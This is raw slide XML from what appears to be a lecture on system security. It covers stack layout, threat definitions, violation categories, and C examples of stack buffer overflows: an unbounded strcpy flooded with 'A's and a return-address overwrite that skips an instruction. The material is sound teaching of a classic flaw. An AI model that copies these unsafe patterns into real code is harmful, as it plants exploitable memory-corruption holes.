              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1680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825" name="Line 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1488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836" name="Line 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1248" y="240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838" name="Line 22"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="1056" y="288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>
                    <a:lumMod val="50000"/>
                  </a:schemeClr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4839" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="624" y="1536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chemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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685800" y="2098675"/>
            <a:ext cx="405447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u="sng" dirty="0"/>
              <a:t>Assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack grows down (Intel, Motorola, SPARC, MIPS)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Stack pointer (%ESP) points to the last address on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859182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D0F9CFD-AC5D-F247-AD98-8CC09518A767}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15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2590800" y="2743200"/>
            <a:ext cx="291488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void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char buffer1[5];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	function(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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990600" y="1828800"/>
            <a:ext cx="728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Let us consider how the stack of this program would look:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1391751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5029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2F8DF79C-8358-2648-A08E-0EE8AB39C7E3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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35859" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2286000"/>
            <a:ext cx="3200400" cy="3581400"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016" cy="2256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35843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225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35845" name="Line 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="2064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3264" y="1584"/>
              <a:ext cx="157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202346"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Function Parameters</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35848" name="Line 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3120" y="240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35849" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="2064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3312" y="2448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3120" y="2784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3504" y="3024"/>
              <a:ext cx="116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202346"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Local Variables</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35853" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6781800" y="2667000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 rot="5400000">
            <a:off x="5787232" y="4042568"/>
            <a:ext cx="266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/>
              <a:t>Higher Memory Addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="774585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180207" y="304800"/>
            <a:ext cx="3200400" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016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56" y="1677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312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180207" y="3505200"/>
            <a:ext cx="320040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08807" y="3962400"/>
            <a:ext cx="291488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void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char buffer1[5];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	function(1);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2438400" y="1249845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438400" y="742890"/>
            <a:ext cx="459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180208" y="5543490"/>
            <a:ext cx="3200400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2438401" y="1626159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438400" y="1676400"/>
            <a:ext cx="468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2438400" y="57150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514600" y="516249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417050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180207" y="304800"/>
            <a:ext cx="3200400" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016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456" y="1677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312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3658" y="2268"/>
              <a:ext cx="62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buffer1</a:t>
              </a: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3180207" y="3505200"/>
            <a:ext cx="320040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408807" y="3962400"/>
            <a:ext cx="291488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/>
              <a:t>void function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	char buffer1[5];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main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	function(1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}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2438400" y="1249845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438400" y="742890"/>
            <a:ext cx="459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7" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3180207" y="2514600"/>
            <a:ext cx="3200400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3123288" y="4291439"/>
            <a:ext cx="3200400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2438400" y="251209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2438400" y="2038290"/>
            <a:ext cx="4689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2438400" y="451491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514600" y="396240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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2130747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charset="0"/>
              </a:rPr>
              <a:t>Example Program 2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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A'; function(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); } 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714885" y="1487545"/>
            <a:ext cx="701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dirty="0"/>
              <a:t>Buffer overflows take advantage of the fact that bounds checking is not performed </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4144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952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The Security Problem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165225"/>
            <a:ext cx="7123113" cy="4852988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System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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> if resources used and accessed as intended under all circumstances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Unachievable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Intruders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> (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crackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) attempt to breach security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Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is potential security violation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Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is attempt to breach security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attack can be accidental or malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Easier to protect against accidental than malicious misuse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2867459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32004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17952" y="3657600"/>
            <a:ext cx="3235256" cy="28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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A';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function(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);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47800" y="971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2672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90599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4196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010093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8763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32004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17952" y="3657600"/>
            <a:ext cx="3235256" cy="28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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A';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function(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);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47800" y="971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2672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90599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4196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010093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429000" y="2103783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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198228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32004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17952" y="3657600"/>
            <a:ext cx="3235256" cy="28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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A';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function(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);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47800" y="971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2672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90599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4196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010093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429000" y="2103783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429000" y="1828800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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="875750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48399" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016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13" y="1913"/>
              <a:ext cx="5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0x41414141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32004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17952" y="3657600"/>
            <a:ext cx="3235256" cy="28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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A';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function(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);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47800" y="971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2672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90599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4196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010093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429000" y="2103783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429000" y="1828800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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20305314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48399" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016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513" y="1672"/>
              <a:ext cx="5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0x41414141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13" y="1913"/>
              <a:ext cx="5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0x41414141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32004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17952" y="3657600"/>
            <a:ext cx="3235256" cy="28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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A';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function(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);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47800" y="971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2672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90599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4196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010093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429000" y="2103783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429000" y="1828800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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1480101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48399" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016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513" y="1479"/>
              <a:ext cx="5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0x41414141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513" y="1672"/>
              <a:ext cx="5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0x41414141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13" y="1913"/>
              <a:ext cx="5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0x41414141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32004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17952" y="3657600"/>
            <a:ext cx="3235256" cy="28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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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main()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[256];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for(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= 0;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&lt; 255;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] = 'A';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function(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);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47800" y="971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2672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90599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4196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010093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429000" y="2103783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429000" y="1828800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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1756877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48399" cy="6400800"/>
            <a:chOff x="3120" y="1440"/>
            <a:chExt cx="2016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3513" y="1479"/>
              <a:ext cx="5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0x41414141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513" y="1672"/>
              <a:ext cx="5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0x41414141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13" y="1913"/>
              <a:ext cx="507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0x41414141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32004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517952" y="3657600"/>
            <a:ext cx="3235256" cy="2867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function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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void main()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char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[256];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for(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= 0;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 &lt; 255; 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++)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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>] = 'A';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Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>      function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>);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447800" y="971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2672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905995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 rot="5400000">
            <a:off x="1252156" y="4711637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010093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3429000" y="2103783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3429000" y="1828800"/>
            <a:ext cx="15717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429995" y="5105400"/>
            <a:ext cx="157139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0x41414141</a:t>
            </a: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29995" y="5662344"/>
            <a:ext cx="17453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Segmentation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
              </a:rPr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2089513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A1FF270-87F7-2842-A66D-01A371E6CC92}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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Program 3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457200" y="1600200"/>
            <a:ext cx="8401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Can we take advantage of this to execute code, instead of crashing?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1524000" y="2209800"/>
            <a:ext cx="54102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void function() {	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   char buffer1[4];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*ret;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   ret = buffer1 + 8;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   (*ret) += 8; }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void main() { 	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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t> x = 0;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    function();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    x = 1; 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 Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>);  } </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="654054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29718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975152" y="3124200"/>
            <a:ext cx="449244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void function() {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char buffer1[4];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*ret;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ret = buffer1 + 8;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(*ret) += 8; }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void main() { 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x = 0;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function();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x = 1;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>); 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72346" y="2495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59436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52400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38862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11480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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="89676" y="685800"/>
            <a:ext cx="2133262" cy="595243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2209800" y="37338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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="995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buffer1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657600" y="211449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874642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29718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975152" y="3124200"/>
            <a:ext cx="449244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void function() {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char buffer1[4];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*ret;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ret = buffer1 + 8;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(*ret) += 8; }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void main() { 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x = 0;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function();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x = 1;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>); 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72346" y="2495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594360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52400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297681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373380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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="89676" y="685800"/>
            <a:ext cx="2133262" cy="595243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2209800" y="409569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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="995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buffer1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657600" y="211449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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Curved Right Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8468436" y="685800"/>
            <a:ext cx="675564" cy="175259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139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3" y="195263"/>
            <a:ext cx="8015287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Security Violation Categories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165225"/>
            <a:ext cx="6700838" cy="5035550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Breach of confidentiality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Unauthorized reading of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Breach of integrity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Unauthorized modification of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Breach of availability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Unauthorized destruction of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Theft of service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Unauthorized use of resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Denial of service (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DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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Prevention of legitimate use</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8708228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72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Address+8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29718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975152" y="3124200"/>
            <a:ext cx="449244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void function() {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char buffer1[4];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*ret;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ret = buffer1 + 8;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(*ret) += 8; }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void main() { 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x = 0;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function();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x = 1;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>("%d\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>n",x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>); 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72346" y="2495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630549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52400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602481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01949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3" name="Curved Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="89676" y="685800"/>
            <a:ext cx="2133262" cy="64008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2209800" y="447669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209800" y="20574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3539445" y="1614832"/>
            <a:ext cx="995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buffer1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657600" y="211449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ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Curved Right Arrow 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8468436" y="685800"/>
            <a:ext cx="675564" cy="175259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0446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722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Address+8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29718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975152" y="3124200"/>
            <a:ext cx="4492448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void function() {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char buffer1[4];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*ret;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ret = buffer1 + 8;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(*ret) += 8; }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void main() { 	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x = 0;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function();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x = 1; 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sz="2400" dirty="0">
                <a:latin typeface="Arial Unicode MS" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
